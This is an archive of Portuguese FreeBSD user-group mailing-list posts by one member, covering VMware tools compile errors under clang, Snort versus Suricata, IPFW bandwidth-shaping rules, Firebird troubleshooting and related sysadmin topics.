 frente... em resumo: os erros que alguns ports tem hoje por não serem
 compatíveis com clang pode ocorrer ao contrário no futuro, ports quebrarem
 porque não rodam com GCC).

 Espero ter sido claro.

 Welkson Renny



Esqueci de postar o link para os tickets abertos para open-vm-tools:
http://sourceforge.net/tracker/?limit=25func=group_id=204462atid=989708assignee=status=category=artgroup=keyword=submitter=artifact_id=assignee=status=1category=artgroup=submitter=keyword=artifact_id=submit=Filter

Monte de coisa para BSD... mas pelo que vi, o software vem sendo atualizado
constantemente.

Welkson Renny
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] FreeBSD no ESXi 5.1 (open-vm-tools x vmware tools oficial) - problemas com Clang

[Welkson Renny de Medeiros]

2013/1/10 Welinaldo Lopes Nascimento welina...@bsd.com.br

 Complementando o erro que ocorre ao compilar o vmblock do vmware-tools:

 Warning: Object directory not changed from original
 //vmware-tools-distrib/lib/modules/source/vmblock-only @ -
 /usr/src/sys machine - /usr/src/sys/amd64/includex86 -
 /usr/src/sys/x86/include
 awk -f @/tools/vnode_if.awk @/kern/vnode_if.src -p
 awk -f @/tools/vnode_if.awk @/kern/vnode_if.src -q
 awk -f @/tools/vnode_if.awk @/kern/vnode_if.src -h
 cc -O2 -pipe  -Wall -Werror -fno-strict-aliasing -Werror -D_KERNEL
 -DKLD_MODULE -nostdinc   -I. -I@ -I@/contrib/altq -finline-limit=8000
 --param inline-unit-growth=100 --param large-function-growth=1000
 -fno-common  -fno-omit-frame-pointer -mcmodel=kernel -mno-red-zone -mno-mmx
 -mno-sse -msoft-float  -fno-asynchronous -unwind-tables -ffreestanding
 -fstack-protector -std=iso9899:1999 -fstack-protector -Wall
 -Wredundant-decls -Wnested-externs -Wstrict-prototypes
  -Wmissing-prototypes -Wpointer-arith -Winline -Wcast-qual  -Wundef
 -Wno-pointer-sign -fformat-extensions  -Wmissing-include-dirs
 -fdiagnostics-show-option   -c block.c
 cc -O2 -pipe  -Wall -Werror -fno-strict-aliasing -Werror -D_KERNEL
 -DKLD_MODULE
 (.)
 vfsops.c:387: error: 'VFS_STATFS' undeclared (first use in this function)
 vfsops.c: At top level:
 vfsops.c:427: error: conflicting types for 'VMBlockVFSSync'
 vfsops.c:70: error: previous declaration of 'VMBlockVFSSync' was here
 *** [vfsops.o] Error code 1



Wellinaldo,

Se puder, posta o erro que ocorre ao tentar compilar o kernel sem clang
(alteração feita no make.conf).

Provavelmente esse seu erro é porque esse código não compila com clang, só
com GCC.

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [OFF-TOPIC] Suricata x Snort - o que muda?

[Welkson Renny de Medeiros]

Em 2 de janeiro de 2013 12:05, Welkson Renny de Medeiros
welk...@gmail.comescreveu:

 Senhores, bom dia!

 Estou a alguns dias implantando um novo servidor (FreeBSD 9.1 amd64 sob
 ESXi 5.1), e cheguei na parte de segurança.

 No servidor antigo eu tinha Snort + OSSEC (com Active Response) + Base...
 as versões eram bem antigas... decidi então nesse novo servidor (com BSD
 9.1) usar as mais atuais...

 A primeira bronca foi logo com o Snort, que nessa versão não mais permite
 fazer output em banco de dados [1]... instalei o tal do Barnyard2, mas
 ainda não consegui gerar os logs do Snort no padrão que o Barnyard entende
 (Unified2)... quando ativo qualquer tipo de output, os logs deixam de ser
 gerados... com todos os outputs comentados, pelo menos o
 /var/log/snort/alert funfa direitinho (mas o Barnyard não interpreta isso).

 A algum tempo vi o Patrick comentando sobre o Suricata, que me parece ser
 um fork do Snort. Alguém tem usado? output database funfa direitinho?
 compatível com as rules do Snort?

 [1] http://blog.snort.org/2012/07/database-output-is-dead-rip.html

 Feliz 2013 a todos! =)

 Welkson Renny
 Natal/RN




Fazendo mais buscas encontrei algumas respostas.

De acordo com o link abaixo, Emerging Threats não funciona no Snort (eu uso
essas rules) - SO rules não conhecia:
http://www.aldeid.com/wiki/Suricata-vs-snort#Rules
http://www.aldeid.com/wiki/EN:Snort/Rules/SO_Rules

Não vi database na lista de Outputs:
http://suricata-ids.org/features/all-features/

Qualquer comentário sobre Snort x Suricata será bem vindo.

Welkson Renny
Natal/RN
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [OFF-TOPIC] Suricata x Snort - o que muda?

[Welkson Renny de Medeiros]

Em 2 de janeiro de 2013 18:52, Antônio Pessoa atnpes...@gmail.comescreveu:

 No endereço abaixo [1] você vai encontrar um material do próprio
 Patrick Tracanelli sobre os dois, com comparativos bem interessantes,
 acredito que valha a pena você dar uma olhada.

 [1] http://www.bhack.com.br/talks/Patrick/BHACK2.pdf

 --
 Atenciosamente,

 Antônio Pessoa




Baixei os slides do BHack a algumas semanas mas ainda não tinha analisado :(

Cara, vendo as explicações do Patrick... o Suricata parece muito
interessante! =)

Amanhã vou instalar e dar uma brincada.

Obrigado pela dica meu amigo!

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] O melhor presente de final de ano. - FreeBSD 9.1-RELEASE

[Welkson Renny de Medeiros]

Em 31 de dezembro de 2012 08:21, Marcelo Gondim gon...@bsdinfo.com.brescreveu:

 Oi Celso,

 Eu chequei as MD5 dos disc1 tanto amd64 e i386 e são as mesmas de quando
 saiu, ou seja, são as mesmas ISOs. Não sei as outras.  :)

 []'s
 Gondim



Ufa! Baixei o 9.1 amd64 e instalei no ESXi 5.1 a poucos dias! Está em
produção com ZFS! Uma bala! =)

Estava com medo de ocorrer alguma mudança no lançamento oficial e ter que
reinstalar (ou fazer algum tipo de update).

Feliz 2013 1 todos!

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [Off-Topic] Mac Ports

[Welkson Renny de Medeiros]

Em 18 de dezembro de 2012 08:15, Frederico Terra Boechat fboec...@gmail.com
 escreveu:

 Tem o fink, já usei aqui mas preferi o macports.

 Dá uma inchada no Mac OS por conta do XCode mas me teve bastante serventia
 :)

 Mac OS, pra mim, é o melhor dos dois mundos, rodo um BSD ao mesmo tempo em
 que eu tenho um desktop BOM

 Frederico Boechat




Uso o HomeBrew, muito bom.

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Firebird não Comunica

[Welkson Renny de Medeiros]

Em 15 de dezembro de 2012 00:05, Luzivan luzi...@gmail.com escreveu:

 Renny, procura os logs do firebird e cola aqui, vai nos ajudar. Uma coisa q
 nao entendi é o que tem haver o samba e permissao 777 nas pastaz, n é
 necessario o samba para fb funcionar. Confirma se o servico ta ouvindo na
 porta 3050, faz um telnet nesta porta a partir de outro pc da rede, cria um
 banco de teste e acessa usando um client qualquer.
 Em 13/12/2012 17:19, Welkson Renny de Medeiros welk...@gmail.com
 escreveu:



Oi Luzivan, beleza?

Na verdade quem está com problemas é o Anker projeto (o cara que abriu o
tópico). Eu estou tentando ajudar.

Confesso que a uns 4 ou 5 anos tentei usar Firebird no FreeBSD e não tive
boas experiências (tudo bem que o sistema usava diversas UDF's como rFUNC,
etc.)... na época os ports de Firebird eram bastante desatualizados,
problemas com semáforos, etc... enfim, pra Firebird eu optei por Linux e
roda tranquilo até hoje. Hoje a realidade talvez seja outra, não sei.

Eu também não entendi a ideia do 777 no Samba... o Firebird não precisa de
Samba.

Abraços,

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Firebird não Comunica

[Welkson Renny de Medeiros]

Em 12 de dezembro de 2012 09:10, Anker Projeto projetoan...@gmail.comescreveu:

 Bom dia galera, ve se vocês podem me ajudar.
 Instalei o Bsd em uma maquina onde eu so preciso que rode o Firebird25, ja
 instalei tudo ok , o serviço esta rodando . So que quando chamo o pessoal
 do sistema para fazer a parte deles não tem jeito de comunicar com o banco
 . Ja instalei o Samba35 e dei 0777 nas pastas e não tem jeito. Tem que
 fazer alguma configuração em especial quando instala o firebird? Eu ja
 troquei o usuario e senha e nada , eu ja li alguma coisa na net e tem o tal
 do /opt , mas nessa versão 2.5 não criar essa pasta , eu ja fiz alguns
 testes em outras versões e ele cria.

 Alguém por favor ?
 Desde já Agradeço !
 #Surra



O serviço está rodando?
sockstat -4 | grep 3050

Qual a mensagem de erro ?

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Limite Banda IPFW

[Welkson Renny de Medeiros]

Em 1 de novembro de 2012 15:37, Corsini . jbcors...@hotmail.com escreveu:

 Certo, meu amigo Welkson, entendi certinho,
 Nesse caso então eu teria que dividir mesmo os ips em cada table, ou seja,
 para utilizar essas velocidades certo? Agora se eu não colocar todos os
 ips nessas tables,
 em qual regra de velocidade ele vai pasar sendo que nas linhas de comando
 eu tenho 500k
 e 2000k, ele pega a ultima regra né isso ?

 Att

 João B. Corsini



Corsini,

Desculpe-me pela demora para responder! Tinha várias mensagens novas no FUG
e acabei não atentando a essa thread.

Eu não estou no trabalho agora, mas na segunda testo com calma e mando mais
detalhes pra você... mas pelo que lembro, se o usuário não tiver em nenhuma
table ele assume a primeira regra (e nessa não tem referência a table
alguma)... no meu caso fica com 400k eu acho.

Na segunda vou testar e passo mais detalhes.

Abraços,

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Limite Banda IPFW

[Welkson Renny de Medeiros]

Em 31 de outubro de 2012 13:11, Eduardo Schoedler lis...@esds.com.brescreveu:

 Uma depois da outra, quando fizer o match ele fará o shaping.



Corsini,

Exemplo rápido:

# se usuario for da table2, saltar para regra 600 (ADMINISTRACAO)
ipfw 10 add skipto 600 all from any to table(2)

# se usuario for da table4, saltar para regra 800 (TURBO)
ipfw 11 add skipto 800 all from any to table(4)

# usuarios administracao - 500kbps (alterei de from any para from not
192...)
ipfw pipe 12 config bw 500Kbit/s mask dst-ip 0x
ipfw 600 add pipe 12 ip from not me to 192.168.0.0/24 not src-port
5432,445,139,
2,3389,4899,5900,5800 out via vr0

# usuarios TURBO
ipfw pipe 14 config bw 2000Kbit/s mask dst-ip 0x
ipfw 800 add pipe 14 ip from not me to 192.168.0.0/24 not src-port
5432,445,139,
2,3389,4899,5800,5900 out via vr0

As regras tem algumas exceções (SSH, TS, Radmin, etc), mas dá pra
aproveitar.

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [Off-Topic] - Troca de senha do AD via web

[Welkson Renny de Medeiros]

Em 25 de outubro de 2012 23:10, Rogério Moura roger...@gmail.com escreveu:

 Uma alternativa seria fazer um Jscript

 Em 24 de outubro de 2012 23:21, Christiano Liberato 
 christianoliber...@gmail.com escreveu:

  Rogerio,
 
  no 2008 nao tem mais o IISADMPWD.


Senhores,

http://jsaaby.wordpress.com/2009/12/02/iisadmpwd-on-server-2008-x64-and-iis7-change-user-domain-password-via-a-webpage/
http://blogs.msdn.com/b/asiatech/archive/2009/03/17/how-to-manage-my-windows-user-password-through-iis-web-portal.aspx

Isso não ajuda?

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd